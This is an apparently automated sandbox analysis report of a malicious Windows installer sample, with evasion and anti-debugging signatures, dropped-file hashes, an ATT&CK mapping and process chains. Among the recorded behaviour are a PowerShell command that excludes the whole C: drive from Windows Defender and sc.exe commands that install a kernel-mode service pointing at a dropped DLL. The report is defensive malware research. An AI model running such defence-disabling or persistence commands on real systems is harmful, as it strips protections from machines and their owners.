Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\cVyexkZjrG.exe; Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmp; Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmp; System information queried: FirmwareTableInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 6838
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 2875
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmp; Window / User API: threadDelayed 572
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmp; Window / User API: threadDelayed 601
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmp; Window / User API: threadDelayed 563
Source: C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-H0N5U.tmp\_isetup\_setup64.tmp
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\Windows NT\hrsw.vbc
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-D54U1.tmp\update.vac
Source: C:\Program Files (x86)\Windows NT\7zr.exe; Dropped PE file which has not been started: C:\Program Files (x86)\Windows NT\tProtect.dll
Source: C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-H0N5U.tmp\update.vac
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-D54U1.tmp\_isetup\_setup64.tmp
Source: C:\Program Files (x86)\Windows NT\7zr.exe; API coverage: 7.7 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1868; Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\conhost.exe; Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmp; Code function: 7_2_6CC4AEC0 FindFirstFileA,FindClose,FindClose,7_2_6CC4AEC0
Source: C:\Program Files (x86)\Windows NT\7zr.exe; Code function: 10_2_00B36868 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW,10_2_00B36868
Source: C:\Program Files (x86)\Windows NT\7zr.exe; Code function: 10_2_00B37496 __EH_prolog,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW,10_2_00B37496
Source: C:\Program Files (x86)\Windows NT\7zr.exe; Code function: 10_2_00B39C60 GetSystemInfo,10_2_00B39C60
Source: cVyexkZjrG.tmp, 00000002.00000002.2150989458.000000000156E000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: cVyexkZjrG.tmp, 00000002.00000002.2150989458.000000000156E000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmp; Code function: 7_2_6CAD3886 NtSetInformationThread 00000000,00000011,00000000,00000000 7_2_6CAD3886
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmp; Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmp; Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmp; Code function: 7_2_6CC60181 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_6CC60181
Source: C:\Program Files (x86)\Windows NT\7zr.exe; Code function: 10_2_00BB57D0 GetCurrentProcessId,GetCurrentThreadId,LoadLibraryW,GetProcAddress,FreeLibrary,GetTickCount,QueryPerformanceCounter,GetTickCount,10_2_00BB57D0
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmp; Code function: 7_2_6CC69D66 mov eax, dword ptr fs:[00000030h] 7_2_6CC69D66
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmp; Code function: 7_2_6CC69D35 mov eax, dword ptr fs:[00000030h] 7_2_6CC69D35
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmp; Code function: 7_2_6CC5F17D mov eax, dword ptr fs:[00000030h] 7_2_6CC5F17D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmp; Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmp; Code function: 7_2_6CC58CBD SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_6CC58CBD

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmp; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: tProtect.dll.13.dr; Static PE information: Found potential injection code
Source: C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmp; Process created: C:\Users\user\Desktop\cVyexkZjrG.exe "C:\Users\user\Desktop\cVyexkZjrG.exe" /VERYSILENT
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmp; Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe; Process created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Windows\System32\cmd.exe; Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe; Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmp; Code function: 7_2_6CD27700 cpuid 7_2_6CD27700
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Program Files (x86)\Windows NT\7zr.exe; Code function: 10_2_00B3AB2A GetSystemTimeAsFileTime,10_2_00B3AB2A
Source: C:\Program Files (x86)\Windows NT\7zr.exe; Code function: 10_2_00BD0090 GetVersion,10_2_00BD0090
Source: cVyexkZjrG.tmp, 00000007.00000002.2288553617.0000000000A53000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: C:\Program Files\Windows Defender\MsMpEng.exe
MITRE ATT&CK matrix, one line per tactic (numbers in parentheses are the report's matched-signature badges as extracted; techniques without a number were not observed):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: Command and Scripting Interpreter (2); Service Execution (1); Native API (1); Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
Persistence: Windows Service (1); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Privilege Escalation: Access Token Manipulation (1); Windows Service (1); Process Injection (111); DLL Side-Loading (1); Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Defense Evasion: Masquerading (11); Disable or Modify Tools (1); Virtualization/Sandbox Evasion (231); Access Token Manipulation (1); Process Injection (111); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (3); Software Packing (1); DLL Side-Loading (1)
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
Discovery: System Time Discovery (1); Security Software Discovery (431); Virtualization/Sandbox Evasion (231); Process Discovery (2); Application Window Discovery (1); System Owner/User Discovery (2); File and Directory Discovery (3); System Information Discovery (25); Network Sniffing
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
Collection: Archive Collected Data (1); Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
Command and Control: Encrypted Channel (1); Junk Data; Steganography; Protocol Impersonation; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Impact: System Shutdown/Reboot (1); Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
Behavior Graph (ID: 1580243, Sample: cVyexkZjrG.exe, Startdate: 24/12/2024, Architecture: WINDOWS, Score: 88)

Top-level signatures: Multi AV Scanner detection for dropped file; Multi AV Scanner detection for submitted file; Found driver which could be used to inject code into processes; Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Process chain recovered from the graph:

  • cVyexkZjrG.exe drops C:\Users\user\AppData\...\cVyexkZjrG.tmp (PE32) and starts cVyexkZjrG.tmp
  • cVyexkZjrG.tmp drops C:\Users\user\AppData\Local\...\update.vac (PE32) and C:\Users\user\AppData\Local\...\_setup64.tmp (PE32+), then starts a second cVyexkZjrG.exe and powershell.exe; signature: Adds a directory exclusion to Windows Defender
  • powershell.exe starts conhost.exe and WmiPrvSE.exe; signature: Loading BitLocker PowerShell Module
  • the second cVyexkZjrG.exe drops C:\Users\user\AppData\...\cVyexkZjrG.tmp (PE32) and starts cVyexkZjrG.tmp
  • the second cVyexkZjrG.tmp drops C:\Users\user\AppData\Local\...\update.vac (PE32), C:\Program Files (x86)\Windows NT\hrsw.vbc (PE32), C:\Users\user\AppData\Local\...\_setup64.tmp (PE32+) and C:\Program Files (x86)\Windows NT\7zr.exe (PE32), then starts 7zr.exe twice; signatures: Query firmware table information (likely to detect VMs); Protects its processes via BreakOnTermination flag; Hides threads from debuggers; Contains functionality to hide a thread from the debugger
  • 7zr.exe drops C:\Program Files (x86)\...\tProtect.dll (PE32+); each 7zr.exe instance starts conhost.exe
  • two cmd.exe instances and 30 other processes start sc.exe instances (26 further processes among them), each sc.exe starting conhost.exe



Source | Detection | Scanner | Label | Link
cVyexkZjrG.exe | 8% | Virustotal | | Browse
cVyexkZjrG.exe | 0% | ReversingLabs | |

Source | Detection | Scanner | Label | Link
C:\Program Files (x86)\Windows NT\7zr.exe | 0% | Virustotal | | Browse
C:\Program Files (x86)\Windows NT\7zr.exe | 0% | ReversingLabs | |
C:\Program Files (x86)\Windows NT\hrsw.vbc | 16% | ReversingLabs | |
C:\Program Files (x86)\Windows NT\tProtect.dll | 9% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\is-D54U1.tmp\_isetup\_setup64.tmp | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\is-D54U1.tmp\update.vac | 16% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\is-H0N5U.tmp\_isetup\_setup64.tmp | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\is-H0N5U.tmp\update.vac | 16% | ReversingLabs | |
No Antivirus matches
No Antivirus matches
No Antivirus matches
No contacted domains info
Name | Source | Malicious | Antivirus Detection | Reputation
https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU | cVyexkZjrG.exe | false | | high
https://www.remobjects.com/ps | cVyexkZjrG.exe, 00000000.00000003.2052689369.00000000029B0000.00000004.00001000.00020000.00000000.sdmp, cVyexkZjrG.exe, 00000000.00000003.2053082904.000000007F74B000.00000004.00001000.00020000.00000000.sdmp, cVyexkZjrG.tmp, 00000002.00000000.2054654528.0000000000C01000.00000020.00000001.01000000.00000004.sdmp, cVyexkZjrG.tmp, 00000007.00000000.2144559370.000000000033D000.00000020.00000001.01000000.00000008.sdmp, cVyexkZjrG.tmp.6.dr, cVyexkZjrG.tmp.0.dr | false | | high
https://www.innosetup.com/ | cVyexkZjrG.exe, 00000000.00000003.2052689369.00000000029B0000.00000004.00001000.00020000.00000000.sdmp, cVyexkZjrG.exe, 00000000.00000003.2053082904.000000007F74B000.00000004.00001000.00020000.00000000.sdmp, cVyexkZjrG.tmp, 00000002.00000000.2054654528.0000000000C01000.00000020.00000001.01000000.00000004.sdmp, cVyexkZjrG.tmp, 00000007.00000000.2144559370.000000000033D000.00000020.00000001.01000000.00000008.sdmp, cVyexkZjrG.tmp.6.dr, cVyexkZjrG.tmp.0.dr | false | | high
        No contacted IP infos
        Joe Sandbox version:41.0.0 Charoite
        Analysis ID:1580243
        Start date and time:2024-12-24 06:22:35 +01:00
        Joe Sandbox product:CloudBasic
        Overall analysis duration:0h 9m 55s
        Hypervisor based Inspection enabled:false
        Report type:full
        Cookbook file name:default.jbs
        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
        Run name:Run with higher sleep bypass
        Number of analysed new started processes analysed:108
        Number of new started drivers analysed:0
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Critical Process Termination
        Sample name:cVyexkZjrG.exe
        renamed because original name is a hash value
        Original Sample Name:5A3C5AA184E4FDB2DE4530C18ADB9B12FFC1A101C86CDE8DE13CE49D7A7A2B44.exe
        Detection:MAL
        Classification:mal88.evad.winEXE@135/33@0/0
        EGA Information:
        • Successful, ratio: 100%
        HCA Information:
        • Successful, ratio: 77%
        • Number of executed functions: 28
        • Number of non-executed functions: 76
        Cookbook Comments:
        • Found application associated with file extension: .exe
        • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
        • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
        • Exclude process from analysis (whitelisted): Conhost.exe, dllhost.exe, SIHClient.exe
        • Excluded IPs from analysis (whitelisted): 13.107.246.63, 20.109.210.53
        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com
        • Not all processes where analyzed, report is missing behavior information
        • Report size exceeded maximum capacity and may have missing behavior information.
        • Report size exceeded maximum capacity and may have missing disassembly code.
        • Report size getting too big, too many NtCreateKey calls found.
        • Report size getting too big, too many NtOpenKeyEx calls found.
        • Report size getting too big, too many NtQueryValueKey calls found.
        No simulations
        No context
        No context
        No context
        No context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
C:\Program Files (x86)\Windows NT\7zr.exe | #U5b89#U88c5#U52a9#U624b1.0.3.exe | Get hash | malicious | Unknown | Browse |
C:\Program Files (x86)\Windows NT\7zr.exe | #U5b89#U88c5#U52a9#U624b1.0.1.exe | Get hash | malicious | Unknown | Browse |
C:\Program Files (x86)\Windows NT\7zr.exe | #U5b89#U88c5#U52a9#U624b1.0.2.exe | Get hash | malicious | Unknown | Browse |
C:\Program Files (x86)\Windows NT\7zr.exe | #U5b89#U88c5#U52a9#U624b1.0.3.exe | Get hash | malicious | Unknown | Browse |
C:\Program Files (x86)\Windows NT\7zr.exe | #U5b89#U88c5#U52a9#U624b1.0.1.exe | Get hash | malicious | Unknown | Browse |
C:\Program Files (x86)\Windows NT\7zr.exe | #U5b89#U88c5#U52a9#U624b1.0.2.exe | Get hash | malicious | Unknown | Browse |
C:\Program Files (x86)\Windows NT\7zr.exe | #U5b89#U88c5#U52a9#U624b1.0.2.exe | Get hash | malicious | Unknown | Browse |
C:\Program Files (x86)\Windows NT\7zr.exe | #U5b89#U88c5#U52a9#U624b_2.0.8.exe | Get hash | malicious | Unknown | Browse |
C:\Program Files (x86)\Windows NT\7zr.exe | #U5b89#U88c5#U52a9#U624b1.0.2.exe | Get hash | malicious | Unknown | Browse |
                          Process:C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmp
                          File Type:PE32 executable (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):831200
                          Entropy (8bit):6.671005303304742
                          Encrypted:false
                          SSDEEP:24576:A48I9t/zu2QSM0TMzOCkY+we/86W5gXKxZ5:Ae71MzuiehWIKxZ
                          MD5:84DC4B92D860E8AEA55D12B1E87EA108
                          SHA1:56074A031A81A2394770D4DA98AC01D99EC77AAD
                          SHA-256:BA1EC2C30212F535231EBEB2D122BDA5DD0529D80769495CCFD74361803E3880
                          SHA-512:CF3552AD1F794582F406FB5A396477A2AA10FCF0210B2F06C3FC4E751DB02193FB9AA792CD994FA398462737E9F9FFA4F19F095A82FC48F860945E98F1B776B7
                          Malicious:false
                          Antivirus:
                          • Antivirus: Virustotal, Detection: 0%, Browse
                          • Antivirus: ReversingLabs, Detection: 0%
                          Joe Sandbox View:
                          • Filename: #U5b89#U88c5#U52a9#U624b1.0.3.exe, Detection: malicious, Browse
                          • Filename: #U5b89#U88c5#U52a9#U624b1.0.1.exe, Detection: malicious, Browse
                          • Filename: #U5b89#U88c5#U52a9#U624b1.0.2.exe, Detection: malicious, Browse
                          • Filename: #U5b89#U88c5#U52a9#U624b1.0.3.exe, Detection: malicious, Browse
                          • Filename: #U5b89#U88c5#U52a9#U624b1.0.1.exe, Detection: malicious, Browse
                          • Filename: #U5b89#U88c5#U52a9#U624b1.0.2.exe, Detection: malicious, Browse
                          • Filename: #U5b89#U88c5#U52a9#U624b1.0.2.exe, Detection: malicious, Browse
                          • Filename: #U5b89#U88c5#U52a9#U624b_2.0.8.exe, Detection: malicious, Browse
                          • Filename: #U5b89#U88c5#U52a9#U624b1.0.2.exe, Detection: malicious, Browse
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9A..} ..} ..} ...<... ...?..~ ...<..t ...?..v ...?... ...(.| ..} ... ...(.t ..K.... ..k_..~ ..K...~ ..f."._ ...R..x ...&..| ..Rich} ..........PE..L....\.d.....................N......:.............@..........................@............@.....................................x........................&.......d......................................................H............................text.............................. ..`.rdata..RZ.......\..................@..@.data...ds... ......................@....sxdata.............................@....rsrc...............................@..@.reloc..2r.......t..................@..B................................................................................................................................................................................................................................................
                          Process:C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmp
                          File Type:data
                          Category:dropped
                          Size (bytes):1991296
                          Entropy (8bit):7.999905359856555
                          Encrypted:true
                          SSDEEP:49152:lCxGJwolu3n/E3sZoXRUrXJ6di0cLXchbke51ul:lCJol2c3YeoXJ6dFcLsH1ul
                          MD5:3A3CBB8509F127F9B690DB6D717EFE0B
                          SHA1:75622A50925038691E199C7A7EE95AEF614E4256
                          SHA-256:FDF35E1926622C8577D26B56F52DA00E5791F9098E0E9D45D55FAB26FABEEB60
                          SHA-512:6C37A9339625CE7F92C1E2759E4A3F439C9A637781179F669591E5FF4BA5AE21FE6631ABD27D861BF6659044FD146F8FEC7CE0E936C2C9F222BB51DE8E943650
                          Malicious:false
                          Preview:.@S.....Hi>...................=..4.8.%W.$<..<.A!x.b...o..2.\....a..V.$3...NY..).......*..e.^S..o.v.}...q....[.....0<>YD....fI.A/.H...... .u..>.~.Pe.h.^.r..........I.0(....{u.Q....g...../(._g.Un....Wl5..WGM=?@...>..1H..<.....R.........e2.F .X....'..b.........H..Ws.....Q..../..t?b.O.'0+.I..k<..&Q.fT.Q\.......(.....Z.`.P.o>V ...1..R...?&Y...p......eX..."d.<T......-d..`...2..n.W.7....N4.........?..m:.J#o...*TJ5<oE..y..i.C....;x.(.a$.|I....m..4.d.J..c.y..O*....r..Q.M..O62,..i....e.......71.`..h.U..{.5...WcYf.>.3p..v......#+`..-....%....+..!CQ9.w..h.F.u..|V;...&{..qb.K.b.E..{..",1z..b.....w............v.4..#.M..(r......T.AB.).P,....eX.e..Q..d....v..U.....8.p..s..&....|.......i....H0.:+.6/.....$RTl...?....[KA.g..j.s..1`...{.5^h^r1.ba...$EZ5...zv:S#.J...2.....0.dh=...Y|=tI.`........d......?E...x.O..k@V.7q.Z....*3W.....g;'..VP.'..g.$..:j..(....x.l.....i...b0....zsIT.$.^A.B...(...<....q.y....p.?$.......r\.........(...Z...].g8....."H..i.i..
                          Process:C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmp
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):3606528
                          Entropy (8bit):7.005604268954487
                          Encrypted:false
                          SSDEEP:98304:yLVLAJG42oakQdhme71MzSRTP/Se7NHaV:yZyTFaOe71MzSP/Se75g
                          MD5:1047AF726D2E233D71934EF55E635C4A
                          SHA1:AB12E827E4E57DEA2E885733F0C48E9A83756678
                          SHA-256:42934349F3C8D0EE1CD121B8386A5A6D28D7E8E54A251AE18AA0992D5897EC44
                          SHA-512:8A26268641B1B3F54ABE04CA2212FCA8BCCBD575DCDAB38F7E921FE9E01C29B99BCE25913642E658027A47E27AED795DD5FF3EF9DDC1077108BE29210052AF7E
                          Malicious:true
                          Antivirus:
                          • Antivirus: ReversingLabs, Detection: 16%
                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....gg...........!.....b..........%.........................................7...........@.........................HC.......J..<....07.X....................@7.$?..........................x........................K...............................text...`a.......b.................. ..`.rdata..<............f..............@..@.data................\..............@....00cfg.......`(.......(.............@..@.tls.........p(.......(.............@....voltbl.F.....(...... (..................8Tk....p.....(......"(............. ..`.rsrc...X....07.......6.............@..@.reloc..$?...@7..@....6.............@..B................................................................................................................................................................................................................................................................................
                          Process:C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmp
                          File Type:data
                          Category:dropped
                          Size (bytes):1991296
                          Entropy (8bit):7.999905359856555
                          Encrypted:true
                          SSDEEP:49152:lCxGJwolu3n/E3sZoXRUrXJ6di0cLXchbke51ul:lCJol2c3YeoXJ6dFcLsH1ul
                          MD5:3A3CBB8509F127F9B690DB6D717EFE0B
                          SHA1:75622A50925038691E199C7A7EE95AEF614E4256
                          SHA-256:FDF35E1926622C8577D26B56F52DA00E5791F9098E0E9D45D55FAB26FABEEB60
                          SHA-512:6C37A9339625CE7F92C1E2759E4A3F439C9A637781179F669591E5FF4BA5AE21FE6631ABD27D861BF6659044FD146F8FEC7CE0E936C2C9F222BB51DE8E943650
                          Malicious:false
                          Preview:.@S.....Hi>...................=..4.8.%W.$<..<.A!x.b...o..2.\....a..V.$3...NY..).......*..e.^S..o.v.}...q....[.....0<>YD....fI.A/.H...... .u..>.~.Pe.h.^.r..........I.0(....{u.Q....g...../(._g.Un....Wl5..WGM=?@...>..1H..<.....R.........e2.F .X....'..b.........H..Ws.....Q..../..t?b.O.'0+.I..k<..&Q.fT.Q\.......(.....Z.`.P.o>V ...1..R...?&Y...p......eX..."d.<T......-d..`...2..n.W.7....N4.........?..m:.J#o...*TJ5<oE..y..i.C....;x.(.a$.|I....m..4.d.J..c.y..O*....r..Q.M..O62,..i....e.......71.`..h.U..{.5...WcYf.>.3p..v......#+`..-....%....+..!CQ9.w..h.F.u..|V;...&{..qb.K.b.E..{..",1z..b.....w............v.4..#.M..(r......T.AB.).P,....eX.e..Q..d....v..U.....8.p..s..&....|.......i....H0.:+.6/.....$RTl...?....[KA.g..j.s..1`...{.5^h^r1.ba...$EZ5...zv:S#.J...2.....0.dh=...Y|=tI.`........d......?E...x.O..k@V.7q.Z....*3W.....g;'..VP.'..g.$..:j..(....x.l.....i...b0....zsIT.$.^A.B...(...<....q.y....p.?$.......r\.........(...Z...].g8....."H..i.i..
                          Process:C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmp
                          File Type:data
                          Category:dropped
                          Size (bytes):1741188
                          Entropy (8bit):7.9999001471583515
                          Encrypted:true
                          SSDEEP:49152:9aEhXvns3rFhdXUq1lMApKE59iYLfn1jtTO/W2Y7u4NC:bXvsbGqXMUKE59i2rSMu4NC
                          MD5:094C0AE003065FFA5629135986100DE9
                          SHA1:4E69EB9649E29070C6F9229663E20E6895EE3635
                          SHA-256:4E32486F96073839E9E674B2C372B58BC4244EAF45994E50D46BF94A3BF6B5ED
                          SHA-512:2C952EB9CFC46F4DF1A4F7E36B372C15B5361513805739E5424095C74AE6C4E1DFC0160505E1CBDFCDA73391E51ED40BC26E2BAE3E7C4CF87EA40DCF2C60F984
                          Malicious:false
